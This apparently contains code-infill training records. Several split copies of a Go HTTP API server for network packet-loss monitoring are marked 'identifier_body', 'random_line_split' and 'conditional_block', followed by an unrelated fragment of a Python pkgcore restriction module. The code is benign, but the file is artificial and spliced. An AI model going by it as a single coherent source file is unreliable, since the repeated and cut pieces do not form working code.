}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQualityDataResponse{200, "", data}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() {
go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
}
| `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type H | identifier_body |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type HostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQualityDataResponse{200, "", data}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() { | go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
} | random_line_split | |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type HostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQuality | a}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() {
go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
}
| DataResponse{200, "", dat | conditional_block |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
